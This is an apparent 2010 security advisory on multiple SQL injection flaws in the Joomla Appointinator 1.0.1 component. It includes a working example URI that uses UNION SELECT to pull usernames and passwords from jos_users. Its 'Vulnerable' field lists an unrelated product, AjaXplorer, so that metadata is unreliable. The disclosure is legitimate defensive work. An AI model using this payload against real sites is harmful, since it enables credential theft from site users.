Joomla Component Appointinator Multiple SQL Injection Vulnerabilities
BID:42007
Info
Joomla Component Appointinator Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 42007 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 27 2010 12:00AM |
| Updated: | Jul 27 2010 12:00AM |
| Credit: | Salvatore Freshta |
| Vulnerable: |
AjaXplorer AjaXplorer 2.5.4 |
| Not Vulnerable: | |
Discussion
Joomla Component Appointinator Multiple SQL Injection Vulnerabilities
The Appointinator component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Appointinator 1.0.1 is vulnerable; other versions may also be affected.
The Appointinator component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Appointinator 1.0.1 is vulnerable; other versions may also be affected.
Exploit / POC
Joomla Component Appointinator Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/path/index.php?option=com_appointinator&view=App&aid=-1 UNION SELECT 1,CONCAT(username,0x3A,password),3,4,5,6 FROM jos_users
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/path/index.php?option=com_appointinator&view=App&aid=-1 UNION SELECT 1,CONCAT(username,0x3A,password),3,4,5,6 FROM jos_users
Solution / Fix
Joomla Component Appointinator Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Joomla Component Appointinator Multiple SQL Injection Vulnerabilities
References:
References:
- Appointinator Homepage (Sven Arenz)